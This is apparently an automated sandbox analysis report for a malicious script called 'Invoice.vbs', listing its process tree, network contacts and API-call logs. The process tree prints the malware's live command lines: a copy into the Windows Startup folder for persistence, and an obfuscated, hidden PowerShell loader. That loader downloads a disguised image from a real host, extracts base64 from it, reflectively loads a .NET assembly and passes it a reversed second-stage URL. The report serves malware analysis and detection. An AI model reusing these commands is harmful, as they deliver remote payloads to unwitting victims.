Summary | ZeroBOX

Invoice.vbs

Generic Malware Antivirus Hide_URL PowerShell
Category Machine Started Completed
FILE s1_win7_x6403_us Aug. 2, 2023, 9:52 a.m. Aug. 2, 2023, 10:09 a.m.
Size 344.0KB
Type Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
MD5 0a480ee9046d242cbd66e5865dabdec3
SHA256 2ca4dede6797827b270cce32637c1d315a9cb0f8dd7cb8a0693bae49afaa0ed5
CRC32 08984157
ssdeep 6144:QnDlMxzak3fKE9+vYUsoYMYXcYQYCqEYfYzMLxTrL9WB9:GMxzak3fKE9+vYUsoYMYXcYQYCqEYfY/
Yara None matched

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\Invoice.vbs

    1072
    • cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 & cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\test22\AppData\Local\Temp\Invoice.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ OWU.vbs')"

      2084
    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J⁂Bp⁂G0⁂YQBn⁂GU⁂VQBy⁂Gw⁂I⁂⁂9⁂C⁂⁂JwBo⁂HQ⁂d⁂Bw⁂HM⁂Og⁂v⁂C8⁂YwBk⁂G4⁂LgBw⁂Gk⁂e⁂Bl⁂Gw⁂YgBp⁂G4⁂LgBp⁂G8⁂LwB2⁂DI⁂LwBy⁂GU⁂Z⁂⁂t⁂Hc⁂aQBs⁂GQ⁂ZgBs⁂G8⁂dwBl⁂HI⁂LQ⁂x⁂GI⁂M⁂Bh⁂GY⁂N⁂⁂v⁂G8⁂cgBp⁂Gc⁂aQBu⁂GE⁂b⁂⁂v⁂HU⁂bgBp⁂HY⁂ZQBy⁂HM⁂bwBf⁂HY⁂YgBz⁂C4⁂agBw⁂GU⁂Zw⁂n⁂Ds⁂J⁂B3⁂GU⁂YgBD⁂Gw⁂aQBl⁂G4⁂d⁂⁂g⁂D0⁂I⁂BO⁂GU⁂dw⁂t⁂E8⁂YgBq⁂GU⁂YwB0⁂C⁂⁂UwB5⁂HM⁂d⁂Bl⁂G0⁂LgBO⁂GU⁂d⁂⁂u⁂Fc⁂ZQBi⁂EM⁂b⁂Bp⁂GU⁂bgB0⁂Ds⁂J⁂Bp⁂G0⁂YQBn⁂GU⁂QgB5⁂HQ⁂ZQBz⁂C⁂⁂PQ⁂g⁂CQ⁂dwBl⁂GI⁂QwBs⁂Gk⁂ZQBu⁂HQ⁂LgBE⁂G8⁂dwBu⁂Gw⁂bwBh⁂GQ⁂R⁂Bh⁂HQ⁂YQ⁂o⁂CQ⁂aQBt⁂GE⁂ZwBl⁂FU⁂cgBs⁂Ck⁂Ow⁂k⁂Gk⁂bQBh⁂Gc⁂ZQBU⁂GU⁂e⁂B0⁂C⁂⁂PQ⁂g⁂Fs⁂UwB5⁂HM⁂d⁂Bl⁂G0⁂LgBU⁂GU⁂e⁂B0⁂C4⁂RQBu⁂GM⁂bwBk⁂Gk⁂bgBn⁂F0⁂Og⁂6⁂FU⁂V⁂BG⁂Dg⁂LgBH⁂GU⁂d⁂BT⁂HQ⁂cgBp⁂G4⁂Zw⁂o⁂CQ⁂aQBt⁂GE⁂ZwBl⁂EI⁂eQB0⁂GU⁂cw⁂p⁂Ds⁂J⁂Bz⁂HQ⁂YQBy⁂HQ⁂RgBs⁂GE⁂Zw⁂g⁂D0⁂I⁂⁂n⁂Dw⁂P⁂BC⁂EE⁂UwBF⁂DY⁂N⁂Bf⁂FM⁂V⁂BB⁂FI⁂V⁂⁂+⁂D4⁂Jw⁂7⁂CQ⁂ZQBu⁂GQ⁂RgBs⁂GE⁂Zw⁂g⁂D0⁂I⁂⁂n⁂Dw⁂P⁂BC⁂EE⁂UwBF⁂DY⁂N⁂Bf⁂EU⁂TgBE⁂D4⁂Pg⁂n⁂Ds⁂J⁂Bz⁂HQ⁂YQBy⁂HQ⁂SQBu⁂GQ⁂ZQB4⁂C⁂⁂PQ⁂g⁂CQ⁂aQBt⁂GE⁂ZwBl⁂FQ⁂ZQB4⁂HQ⁂LgBJ⁂G4⁂Z⁂Bl⁂Hg⁂TwBm⁂Cg⁂J⁂Bz⁂HQ⁂YQBy⁂HQ⁂RgBs⁂GE⁂Zw⁂p⁂Ds⁂J⁂Bl⁂G4⁂Z⁂BJ⁂G4⁂Z⁂Bl⁂Hg⁂I⁂⁂9⁂C⁂⁂J⁂Bp⁂G0⁂YQBn⁂GU⁂V⁂Bl⁂Hg⁂d⁂⁂u⁂Ek⁂bgBk⁂GU⁂e⁂BP⁂GY⁂K⁂⁂k⁂GU⁂bgBk⁂EY⁂b⁂Bh⁂Gc⁂KQ⁂7⁂CQ⁂cwB0⁂GE⁂cgB0⁂Ek⁂bgBk⁂GU⁂e⁂⁂g⁂C0⁂ZwBl⁂C⁂⁂M⁂⁂g⁂C0⁂YQBu⁂GQ⁂I⁂⁂k⁂GU⁂bgBk⁂Ek⁂bgBk⁂GU⁂e⁂⁂g⁂C0⁂ZwB0⁂C⁂⁂J⁂Bz⁂HQ⁂YQBy⁂HQ⁂SQBu⁂GQ⁂ZQB4⁂Ds⁂J⁂Bz⁂HQ⁂YQBy⁂HQ⁂SQBu⁂GQ⁂ZQB4⁂C⁂⁂Kw⁂9⁂C⁂⁂J⁂Bz⁂HQ⁂YQBy⁂HQ⁂RgBs⁂GE⁂Zw⁂u⁂Ew⁂ZQBu⁂Gc⁂d⁂Bo⁂Ds⁂J⁂Bi⁂GE⁂cwBl⁂DY⁂N⁂BM⁂GU⁂bgBn⁂HQ⁂a⁂⁂g⁂D0⁂I⁂⁂k⁂GU⁂bgBk⁂Ek⁂bgBk⁂GU⁂e⁂⁂g⁂C0⁂I⁂⁂k⁂HM⁂d⁂Bh⁂HI⁂d⁂BJ⁂G4⁂Z⁂Bl⁂Hg⁂Ow⁂k⁂GI⁂YQBz⁂GU⁂Ng⁂0⁂EM⁂bwBt⁂G0⁂YQBu⁂GQ⁂I⁂⁂9⁂C⁂⁂J⁂Bp⁂G0⁂YQBn⁂GU⁂V⁂Bl⁂Hg⁂d⁂⁂u⁂FM⁂dQBi⁂HM⁂d⁂By⁂Gk⁂bgBn⁂Cg⁂J⁂Bz⁂HQ⁂YQBy⁂HQ⁂SQBu⁂GQ⁂ZQB4⁂Cw⁂I⁂⁂k⁂GI⁂YQBz⁂GU⁂Ng⁂0⁂Ew⁂ZQBu⁂Gc⁂d⁂Bo⁂Ck⁂Ow⁂k⁂GM⁂bwBt⁂G0⁂YQBu⁂GQ⁂QgB5⁂HQ⁂ZQBz⁂C⁂⁂PQ⁂g⁂Fs⁂UwB5⁂HM⁂d⁂Bl⁂G0⁂LgBD⁂G8⁂bgB2⁂GU⁂cgB0⁂F0⁂Og⁂6⁂EY⁂cgBv⁂G0⁂QgBh⁂HM⁂ZQ⁂2⁂DQ⁂UwB0⁂HI⁂aQBu⁂Gc⁂K⁂⁂k⁂GI⁂YQBz⁂GU⁂Ng⁂0⁂EM⁂bwBt⁂G0⁂YQBu⁂GQ⁂KQ⁂7⁂CQ⁂b⁂Bv⁂GE⁂Z⁂Bl⁂GQ⁂QQBz⁂HM⁂ZQBt⁂GI⁂b⁂B5⁂C⁂⁂PQ⁂g⁂Fs⁂UwB5⁂HM⁂d⁂Bl⁂G0⁂LgBS⁂GU⁂ZgBs⁂GU⁂YwB0⁂Gk⁂bwBu⁂C4⁂QQBz⁂HM⁂ZQBt⁂GI⁂b⁂B5⁂F0⁂Og⁂6⁂Ew⁂bwBh⁂GQ⁂K⁂⁂k⁂GM⁂bwBt⁂G0⁂YQBu⁂GQ⁂QgB5⁂HQ⁂ZQBz⁂Ck⁂Ow⁂k⁂HQ⁂eQBw⁂GU⁂I⁂⁂9⁂C⁂⁂J⁂Bs⁂G8⁂YQBk⁂GU⁂Z⁂BB⁂HM⁂cwBl⁂G0⁂YgBs⁂Hk⁂LgBH⁂GU⁂d⁂BU⁂Hk⁂c⁂Bl⁂Cg⁂JwBG⁂Gk⁂YgBl⁂HI⁂LgBI⁂G8⁂bQBl⁂Cc⁂KQ⁂7⁂CQ⁂bQBl⁂HQ⁂a⁂Bv⁂GQ⁂I⁂⁂9⁂C⁂⁂J⁂B0⁂Hk⁂c⁂Bl⁂C4⁂RwBl⁂HQ⁂TQBl⁂HQ⁂a⁂Bv⁂GQ⁂K⁂⁂n⁂FY⁂QQBJ⁂Cc⁂KQ⁂7⁂CQ⁂YQBy⁂Gc⁂dQBt⁂GU⁂bgB0⁂HM⁂I⁂⁂9⁂C⁂⁂L⁂⁂o⁂Cc⁂d⁂B4⁂HQ⁂LgBm⁂GM⁂dg⁂x⁂C8⁂Qg⁂v⁂Ho⁂bg⁂u⁂Gc⁂bgBp⁂GQ⁂b⁂Bp⁂HU⁂YgBk⁂HI⁂YQB5⁂G4⁂aQB3⁂C8⁂Lw⁂6⁂HM⁂c⁂B0⁂HQ⁂a⁂⁂n⁂Ck⁂Ow⁂k⁂G0⁂ZQB0⁂Gg⁂bwBk⁂C4⁂SQBu⁂HY⁂bwBr⁂GU⁂K⁂⁂k⁂G4⁂dQBs⁂Gw⁂L⁂⁂g⁂CQ⁂YQBy⁂Gc⁂dQBt⁂GU⁂bgB0⁂HM⁂KQ⁂=';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('⁂','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD

      2428
      • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypss -NoProfile -command "$imageUrl = 'https://cdn.pixelbin.io/v2/red-wildflower-1b0af4/original/universo_vbs.jpeg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI');$arguments = ,('txt.fcv1/B/zn.gnidliubdrayniw//:sptth');$method.Invoke($null, $arguments)"

        2520

IP Address Status Action
164.124.101.2 Active Moloch
54.230.167.111 Active Moloch

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleA

buffer: Pinging 127.0.0.1
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: with 32 bytes of data:
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Reply from 127.0.0.1:
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: bytes=32
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: time<1ms
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: TTL=128
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Reply from 127.0.0.1:
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: bytes=32
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: time<1ms
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: TTL=128
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Reply from 127.0.0.1:
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: bytes=32
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: time<1ms
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: TTL=128
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Reply from 127.0.0.1:
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: bytes=32
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: time<1ms
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: TTL=128
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Reply from 127.0.0.1:
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: bytes=32
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: time<1ms
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: TTL=128
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Ping statistics for 127.0.0.1: Packets: Sent = 5, Received = 5, Lost = 0 (0% loss),
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Approximate round trip times in milli-seconds: Minimum = 0ms, Maximum = 0ms, Average = 0ms
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: Exception calling "DownloadData" with "1" argument(s): "The underlying connecti
console_handle: 0x00000023
1 1 0

WriteConsoleW

buffer: on was closed: An unexpected error occurred on a send."
console_handle: 0x0000002f
1 1 0

WriteConsoleW

buffer: At line:1 char:173
console_handle: 0x0000003b
1 1 0

WriteConsoleW

buffer: + $imageUrl = 'https://cdn.pixelbin.io/v2/red-wildflower-1b0af4/original/univer
console_handle: 0x00000047
1 1 0

WriteConsoleW

buffer: so_vbs.jpeg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webCli
console_handle: 0x00000053
1 1 0

WriteConsoleW

buffer: ent.DownloadData <<<< ($imageUrl);$imageText = [System.Text.Encoding]::UTF8.Get
console_handle: 0x0000005f
1 1 0

WriteConsoleW

buffer: String($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>'
console_handle: 0x0000006b
1 1 0

WriteConsoleW

buffer: ;$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($e
console_handle: 0x00000077
1 1 0

WriteConsoleW

buffer: ndFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startF
console_handle: 0x00000083
1 1 0

WriteConsoleW

buffer: lag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.
console_handle: 0x0000008f
1 1 0

WriteConsoleW

buffer: Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBas
console_handle: 0x0000009b
1 1 0

WriteConsoleW

buffer: e64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load(
console_handle: 0x000000a7
1 1 0

WriteConsoleW

buffer: $commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.Ge
console_handle: 0x000000b3
1 1 0

WriteConsoleW

buffer: tMethod('VAI');$arguments = ,('txt.fcv1/B/zn.gnidliubdrayniw//:sptth');$method.
console_handle: 0x000000bf
1 1 0

WriteConsoleW

buffer: Invoke($null, $arguments)
console_handle: 0x000000cb
1 1 0

WriteConsoleW

buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
console_handle: 0x000000d7
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : DotNetMethodException
console_handle: 0x000000e3
1 1 0

WriteConsoleW

buffer: Exception calling "GetString" with "1" argument(s): "Array cannot be null.
console_handle: 0x00000103
1 1 0

WriteConsoleW

buffer: Parameter name: bytes"
console_handle: 0x0000010f
1 1 0

WriteConsoleW

buffer: At line:1 char:236
console_handle: 0x0000011b
1 1 0

WriteConsoleW

buffer: + $imageUrl = 'https://cdn.pixelbin.io/v2/red-wildflower-1b0af4/original/univer
console_handle: 0x00000127
1 1 0

WriteConsoleW

buffer: so_vbs.jpeg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webCli
console_handle: 0x00000133
1 1 0

WriteConsoleW

buffer: ent.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString
console_handle: 0x0000013f
1 1 0

WriteConsoleW

buffer: <<<< ($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>'
console_handle: 0x0000014b
1 1 0

WriteConsoleW

buffer: ;$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($e
console_handle: 0x00000157
1 1 0

WriteConsoleW

buffer: ndFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startF
console_handle: 0x00000163
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002dff38
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e0078
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e0078
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e0078
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002df878
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002df878
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002df878
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002df878
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002df878
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002df878
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e0078
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e0078
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e0078
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e05f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e05f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e05f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e02f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e05f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e05f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e05f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e05f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e05f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e05f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e05f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e03b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e03b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e03b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e03b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e03b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e03b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e03b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e03b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e03b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e03b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e03b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e03b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e03b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e03b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e0438
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e0438
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003ead70
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003eaeb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003eaeb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003eaeb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003ea630
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003ea630
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003ea630
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003ea630
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003ea630
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003ea630
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2304
region_size: 2228224
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026b0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2304
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02890000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2304
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72681000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2304
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0245a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2304
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72682000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2304
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02452000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2304
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024a2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2304
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02891000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2304
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02892000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2304
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024ca000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2304
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024a3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2304
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024a4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2304
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024db000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2304
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024d7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2304
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0245b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2304
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2304
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024d5000
